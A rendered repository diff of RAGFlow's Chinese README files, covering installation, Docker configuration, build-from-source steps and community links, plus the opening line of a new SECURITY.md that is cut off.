```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
|
||||||
|
uv run download_deps.py
|
||||||
|
pre-commit install
|
||||||
|
```
|
||||||
|
|
||||||
|
3. 透過 Docker Compose 啟動依賴的服務(MinIO, Elasticsearch, Redis, and MySQL):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
docker compose -f docker/docker-compose-base.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
在 `/etc/hosts` 中加入以下程式碼,將 **conf/service_conf.yaml** 檔案中的所有 host 位址都解析為 `127.0.0.1`:
|
||||||
|
|
||||||
|
```
|
||||||
|
127.0.0.1 es01 infinity mysql minio redis sandbox-executor-manager
|
||||||
|
```
|
||||||
|
|
||||||
|
4. 如果無法存取 HuggingFace,可以把環境變數 `HF_ENDPOINT` 設為對應的鏡像網站:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
export HF_ENDPOINT=https://hf-mirror.com
|
||||||
|
```
|
||||||
|
|
||||||
|
5. 如果你的作業系統沒有 jemalloc,請按照以下方式安裝:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# ubuntu
|
||||||
|
sudo apt-get install libjemalloc-dev
|
||||||
|
# centos
|
||||||
|
sudo yum install jemalloc
|
||||||
|
```
|
||||||
|
|
||||||
|
6. 啟動後端服務:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
source .venv/bin/activate
|
||||||
|
export PYTHONPATH=$(pwd)
|
||||||
|
bash docker/launch_backend_service.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
7. 安裝前端依賴:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd web
|
||||||
|
npm install
|
||||||
|
```
|
||||||
|
|
||||||
|
8. 啟動前端服務:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm run dev
|
||||||
|
```
|
||||||
|
|
||||||
|
_以下介面說明系統已成功啟動:_
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
9. 開發完成後停止 RAGFlow 前端和後端服務:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pkill -f "ragflow_server.py|task_executor.py"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 📚 技術文檔
|
||||||
|
|
||||||
|
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||||
|
- [Configuration](https://ragflow.io/docs/dev/configurations)
|
||||||
|
- [Release notes](https://ragflow.io/docs/dev/release_notes)
|
||||||
|
- [User guides](https://ragflow.io/docs/dev/category/guides)
|
||||||
|
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
|
||||||
|
- [References](https://ragflow.io/docs/dev/category/references)
|
||||||
|
- [FAQs](https://ragflow.io/docs/dev/faq)
|
||||||
|
|
||||||
|
## 📜 路線圖
|
||||||
|
|
||||||
|
詳見 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
|
||||||
|
|
||||||
|
## 🏄 開源社群
|
||||||
|
|
||||||
|
- [Discord](https://discord.gg/NjYzJD3GM3)
|
||||||
|
- [Twitter](https://twitter.com/infiniflowai)
|
||||||
|
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||||
|
|
||||||
|
## 🙌 貢獻指南
|
||||||
|
|
||||||
|
RAGFlow 只有透過開源協作才能蓬勃發展。秉持這項精神,我們歡迎來自社區的各種貢獻。如果您有意參與其中,請查閱我們的 [貢獻者指南](https://ragflow.io/docs/dev/contributing) 。
|
||||||
|
|
||||||
|
## 🤝 商務合作
|
||||||
|
|
||||||
|
- [預約諮詢](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
|
||||||
|
|
||||||
|
## 👥 加入社區
|
||||||
|
|
||||||
|
掃二維碼加入 RAGFlow 小助手,進 RAGFlow 交流群。
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
|
||||||
|
</p>
|
||||||
README_zh.md
@@ -5,28 +5,99 @@
|
|||||||
</div>
|
</div>
|
||||||
|
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<a href="./README.md">English</a> |
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
|
||||||
<a href="./README_zh.md">简体中文</a> |
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DBEDFA"></a>
|
||||||
<a href="./README_ja.md">日本語</a>
|
<a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
|
||||||
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
|
||||||
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
<p align="center">
|
<p align="center">
|
||||||
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
|
||||||
|
</a>
|
||||||
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
|
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
|
</a>
|
||||||
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||||
</a>
|
</a>
|
||||||
<a href="https://demo.ragflow.io" target="_blank">
|
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
</a>
|
||||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
alt="docker pull infiniflow/ragflow:v0.3.2"></a>
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
</a>
|
||||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
|
||||||
</a>
|
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
<div align="center">
|
||||||
|
<a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<details open>
|
||||||
|
<summary><b>📕 目录</b></summary>
|
||||||
|
|
||||||
|
- 💡 [RAGFlow 是什么?](#-RAGFlow-是什么)
|
||||||
|
- 🎮 [Demo](#-demo)
|
||||||
|
- 📌 [近期更新](#-近期更新)
|
||||||
|
- 🌟 [主要功能](#-主要功能)
|
||||||
|
- 🔎 [系统架构](#-系统架构)
|
||||||
|
- 🎬 [快速开始](#-快速开始)
|
||||||
|
- 🔧 [系统配置](#-系统配置)
|
||||||
|
- 🔨 [以源代码启动服务](#-以源代码启动服务)
|
||||||
|
- 📚 [技术文档](#-技术文档)
|
||||||
|
- 📜 [路线图](#-路线图)
|
||||||
|
- 🏄 [贡献指南](#-贡献指南)
|
||||||
|
- 🙌 [加入社区](#-加入社区)
|
||||||
|
- 🤝 [商务合作](#-商务合作)
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
## 💡 RAGFlow 是什么?
|
## 💡 RAGFlow 是什么?
|
||||||
|
|
||||||
[RAGFlow](https://demo.ragflow.io) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
||||||
|
|
||||||
|
## 🎮 Demo 试用
|
||||||
|
|
||||||
|
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🔥 近期更新
|
||||||
|
|
||||||
|
- 2025-08-01 支持 agentic workflow。
|
||||||
|
- 2025-05-23 Agent 新增 Python/JS 代码执行器组件。
|
||||||
|
- 2025-05-05 支持跨语言查询。
|
||||||
|
- 2025-03-19 PDF 和 DOCX 中的图支持用多模态大模型去解析得到描述.
|
||||||
|
- 2025-02-28 结合互联网搜索(Tavily),对于任意大模型实现类似 Deep Research 的推理功能.
|
||||||
|
- 2024-12-18 升级了 DeepDoc 的文档布局分析模型。
|
||||||
|
- 2024-08-22 支持用 RAG 技术实现从自然语言到 SQL 语句的转换。
|
||||||
|
|
||||||
|
## 🎉 关注项目
|
||||||
|
|
||||||
|
⭐️ 点击右上角的 Star 关注 RAGFlow,可以获取最新发布的实时通知 !🌟
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
## 🌟 主要功能
|
## 🌟 主要功能
|
||||||
|
|
||||||
@ -47,7 +118,7 @@
|
|||||||
|
|
||||||
### 🍔 **兼容各类异构数据源**
|
### 🍔 **兼容各类异构数据源**
|
||||||
|
|
||||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
|
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
||||||
|
|
||||||
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
||||||
|
|
||||||
@ -56,16 +127,6 @@
|
|||||||
- 基于多路召回、融合重排序。
|
- 基于多路召回、融合重排序。
|
||||||
- 提供易用的 API,可以轻松集成到各类企业系统。
|
- 提供易用的 API,可以轻松集成到各类企业系统。
|
||||||
|
|
||||||
## 📌 新增功能
|
|
||||||
|
|
||||||
- 2024-04-19 支持对话 API ([更多](./docs/conversation_api.md)).
|
|
||||||
- 2024-04-16 添加嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 。
|
|
||||||
- 2024-04-16 添加 [FastEmbed](https://github.com/qdrant/fastembed) 专为轻型和高速嵌入而设计。
|
|
||||||
- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
|
|
||||||
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
|
|
||||||
- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
|
|
||||||
- 2024-04-07 支持中文界面。
|
|
||||||
|
|
||||||
## 🔎 系统架构
|
## 🔎 系统架构
|
||||||
|
|
||||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
@ -80,11 +141,14 @@
|
|||||||
- RAM >= 16 GB
|
- RAM >= 16 GB
|
||||||
- Disk >= 50 GB
|
- Disk >= 50 GB
|
||||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||||
> 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
|
- [gVisor](https://gvisor.dev/docs/user_guide/install/): 仅在你打算使用 RAGFlow 的代码执行器(沙箱)功能时才需要安装。
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
|
||||||
|
|
||||||
### 🚀 启动服务器
|
### 🚀 启动服务器
|
||||||
|
|
||||||
1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】:
|
1. 确保 `vm.max_map_count` 不小于 262144:
|
||||||
|
|
||||||
> 如需确认 `vm.max_map_count` 的大小:
|
> 如需确认 `vm.max_map_count` 的大小:
|
||||||
>
|
>
|
||||||
@ -113,13 +177,33 @@
|
|||||||
|
|
||||||
3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
|
3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
|
||||||
|
|
||||||
|
> [!CAUTION]
|
||||||
|
> 请注意,目前官方提供的所有 Docker 镜像均基于 x86 架构构建,并不提供基于 ARM64 的 Docker 镜像。
|
||||||
|
> 如果你的操作系统是 ARM64 架构,请参考[这篇文档](https://ragflow.io/docs/dev/build_docker_image)自行构建 Docker 镜像。
|
||||||
|
|
||||||
|
> 运行以下命令会自动下载 RAGFlow slim Docker 镜像 `v0.20.0-slim`。请参考下表查看不同 Docker 发行版的描述。如需下载不同于 `v0.20.0-slim` 的 Docker 镜像,请在运行 `docker compose` 启动服务之前先更新 **docker/.env** 文件内的 `RAGFLOW_IMAGE` 变量。比如,你可以通过设置 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` 来下载 RAGFlow 镜像的 `v0.20.0` 完整发行版。
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
$ cd ragflow/docker
|
$ cd ragflow/docker
|
||||||
$ chmod +x ./entrypoint.sh
|
# Use CPU for embedding and DeepDoc tasks:
|
||||||
$ docker compose -f docker-compose-CN.yml up -d
|
$ docker compose -f docker-compose.yml up -d
|
||||||
|
|
||||||
|
# To use GPU to accelerate embedding and DeepDoc tasks:
|
||||||
|
# docker compose -f docker-compose-gpu.yml up -d
|
||||||
```
|
```
|
||||||
|
|
||||||
> 核心镜像文件大约 15 GB,可能需要一定时间拉取。请耐心等待。
|
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
|
||||||
|
| ----------------- | --------------- | --------------------- | ------------------------ |
|
||||||
|
| v0.20.0 | ≈9 | :heavy_check_mark: | Stable release |
|
||||||
|
| v0.20.0-slim | ≈2 | ❌ | Stable release |
|
||||||
|
| nightly | ≈9 | :heavy_check_mark: | _Unstable_ nightly build |
|
||||||
|
| nightly-slim | ≈2 | ❌ | _Unstable_ nightly build |
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> 如果你遇到 Docker 镜像拉不下来的问题,可以在 **docker/.env** 文件内根据变量 `RAGFLOW_IMAGE` 的注释提示选择华为云或者阿里云的相应镜像。
|
||||||
|
>
|
||||||
|
> - 华为云镜像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
|
||||||
|
> - 阿里云镜像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
|
||||||
|
|
||||||
4. 服务器启动成功后再次确认服务器状态:
|
4. 服务器启动成功后再次确认服务器状态:
|
||||||
|
|
||||||
@ -130,25 +214,22 @@
|
|||||||
_出现以下界面提示说明服务器启动成功:_
|
_出现以下界面提示说明服务器启动成功:_
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
____ ______ __
|
____ ___ ______ ______ __
|
||||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
/ __ \ / | / ____// ____// /____ _ __
|
||||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
|
||||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
|
||||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
|
||||||
/____/
|
|
||||||
|
|
||||||
* Running on all addresses (0.0.0.0)
|
* Running on all addresses (0.0.0.0)
|
||||||
* Running on http://127.0.0.1:9380
|
|
||||||
* Running on http://x.x.x.x:9380
|
|
||||||
INFO:werkzeug:Press CTRL+C to quit
|
|
||||||
```
|
```
|
||||||
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anomaly` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
|
||||||
|
> 如果您在没有看到上面的提示信息出来之前,就尝试登录 RAGFlow,你的浏览器有可能会提示 `network anormal` 或 `网络异常`。
|
||||||
|
|
||||||
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
||||||
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
||||||
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
||||||
|
|
||||||
> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
|
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
||||||
|
|
||||||
_好戏开始,接着奏乐接着舞!_
|
_好戏开始,接着奏乐接着舞!_
|
||||||
|
|
||||||
@ -157,50 +238,169 @@
|
|||||||
系统配置涉及以下三份文件:
|
系统配置涉及以下三份文件:
|
||||||
|
|
||||||
- [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
|
- [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
|
||||||
- [service_conf.yaml](./docker/service_conf.yaml):配置各类后台服务。
|
- [service_conf.yaml.template](./docker/service_conf.yaml.template):配置各类后台服务。
|
||||||
- [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
|
- [docker-compose.yml](./docker/docker-compose.yml): 系统依赖该文件完成启动。
|
||||||
|
|
||||||
请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致!
|
请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件中的配置保持一致!
|
||||||
|
|
||||||
> [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
|
如果不能访问镜像站点 hub.docker.com 或者模型站点 huggingface.co,请按照 [.env](./docker/.env) 注释修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
|
||||||
|
|
||||||
如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
|
> [./docker/README](./docker/README.md) 解释了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的环境变量设置和服务配置。
|
||||||
|
|
||||||
|
如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose.yml](./docker/docker-compose.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
|
||||||
|
|
||||||
> 所有系统配置都需要通过系统重启生效:
|
> 所有系统配置都需要通过系统重启生效:
|
||||||
>
|
>
|
||||||
> ```bash
|
> ```bash
|
||||||
> $ docker compose -f docker-compose-CN.yml up -d
|
> $ docker compose -f docker-compose.yml up -d
|
||||||
> ```
|
> ```
|
||||||
|
|
||||||
## 🛠️ 源码编译、安装 Docker 镜像
|
### 把文档引擎从 Elasticsearch 切换成为 Infinity
|
||||||
|
|
||||||
如需从源码安装 Docker 镜像:
|
RAGFlow 默认使用 Elasticsearch 存储文本和向量数据. 如果要切换为 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步骤进行:
|
||||||
|
|
||||||
|
1. 停止所有容器运行:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml down -v
|
||||||
|
```
|
||||||
|
Note: `-v` 将会删除 docker 容器的 volumes,已有的数据会被清空。
|
||||||
|
|
||||||
|
2. 设置 **docker/.env** 目录中的 `DOC_ENGINE` 为 `infinity`.
|
||||||
|
|
||||||
|
3. 启动容器:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker-compose.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
> [!WARNING]
|
||||||
|
> Infinity 目前官方并未正式支持在 Linux/arm64 架构下的机器上运行.
|
||||||
|
|
||||||
|
## 🔧 源码编译 Docker 镜像(不含 embedding 模型)
|
||||||
|
|
||||||
|
本 Docker 镜像大小约 2 GB 左右并且依赖外部的大模型和 embedding 服务。
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
$ git clone https://github.com/infiniflow/ragflow.git
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
$ cd ragflow/
|
cd ragflow/
|
||||||
$ docker build -t infiniflow/ragflow:v0.3.2 .
|
docker build --platform linux/amd64 --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
|
||||||
$ cd ragflow/docker
|
|
||||||
$ chmod +x ./entrypoint.sh
|
|
||||||
$ docker compose up -d
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## 🔧 源码编译 Docker 镜像(包含 embedding 模型)
|
||||||
|
|
||||||
|
本 Docker 大小约 9 GB 左右。由于已包含 embedding 模型,所以只需依赖外部的大模型服务即可。
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔨 以源代码启动服务
|
||||||
|
|
||||||
|
1. 安装 uv。如已经安装,可跳过本步骤:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pipx install uv pre-commit
|
||||||
|
export UV_INDEX=https://mirrors.aliyun.com/pypi/simple
|
||||||
|
```
|
||||||
|
|
||||||
|
2. 下载源代码并安装 Python 依赖:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
|
||||||
|
uv run download_deps.py
|
||||||
|
pre-commit install
|
||||||
|
```
|
||||||
|
|
||||||
|
3. 通过 Docker Compose 启动依赖的服务(MinIO, Elasticsearch, Redis, and MySQL):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
docker compose -f docker/docker-compose-base.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
在 `/etc/hosts` 中添加以下代码,目的是将 **conf/service_conf.yaml** 文件中的所有 host 地址都解析为 `127.0.0.1`:
|
||||||
|
|
||||||
|
```
|
||||||
|
127.0.0.1 es01 infinity mysql minio redis sandbox-executor-manager
|
||||||
|
```
|
||||||
|
4. 如果无法访问 HuggingFace,可以把环境变量 `HF_ENDPOINT` 设成相应的镜像站点:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
export HF_ENDPOINT=https://hf-mirror.com
|
||||||
|
```
|
||||||
|
|
||||||
|
5. 如果你的操作系统没有 jemalloc,请按照如下方式安装:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# ubuntu
|
||||||
|
sudo apt-get install libjemalloc-dev
|
||||||
|
# centos
|
||||||
|
sudo yum install jemalloc
|
||||||
|
```
|
||||||
|
|
||||||
|
6. 启动后端服务:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
source .venv/bin/activate
|
||||||
|
export PYTHONPATH=$(pwd)
|
||||||
|
bash docker/launch_backend_service.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
7. 安装前端依赖:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd web
|
||||||
|
npm install
|
||||||
|
```
|
||||||
|
|
||||||
|
8. 启动前端服务:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm run dev
|
||||||
|
```
|
||||||
|
|
||||||
|
_以下界面说明系统已经成功启动:_
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
9. 开发完成后停止 RAGFlow 前端和后端服务:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pkill -f "ragflow_server.py|task_executor.py"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## 📚 技术文档
|
## 📚 技术文档
|
||||||
|
|
||||||
- [FAQ](./docs/faq.md)
|
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||||
|
- [Configuration](https://ragflow.io/docs/dev/configurations)
|
||||||
|
- [Release notes](https://ragflow.io/docs/dev/release_notes)
|
||||||
|
- [User guides](https://ragflow.io/docs/dev/category/guides)
|
||||||
|
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
|
||||||
|
- [References](https://ragflow.io/docs/dev/category/references)
|
||||||
|
- [FAQs](https://ragflow.io/docs/dev/faq)
|
||||||
|
|
||||||
## 📜 路线图
|
## 📜 路线图
|
||||||
|
|
||||||
详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
|
详见 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
|
||||||
|
|
||||||
## 🏄 开源社区
|
## 🏄 开源社区
|
||||||
|
|
||||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
- [Discord](https://discord.gg/zd4qPW6t)
|
||||||
- [Twitter](https://twitter.com/infiniflowai)
|
- [Twitter](https://twitter.com/infiniflowai)
|
||||||
|
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||||
|
|
||||||
## 🙌 贡献指南
|
## 🙌 贡献指南
|
||||||
|
|
||||||
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
|
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](https://ragflow.io/docs/dev/contributing) 。
|
||||||
|
|
||||||
|
## 🤝 商务合作
|
||||||
|
|
||||||
|
- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
|
||||||
|
|
||||||
## 👥 加入社区
|
## 👥 加入社区
|
||||||
|
|
||||||
@ -209,4 +409,3 @@ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们
|
|||||||
<p align="center">
|
<p align="center">
|
||||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
|
<img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
|
|||||||
74	SECURITY.md	Normal file

@@ -0,0 +1,74 @@
# Security Policy

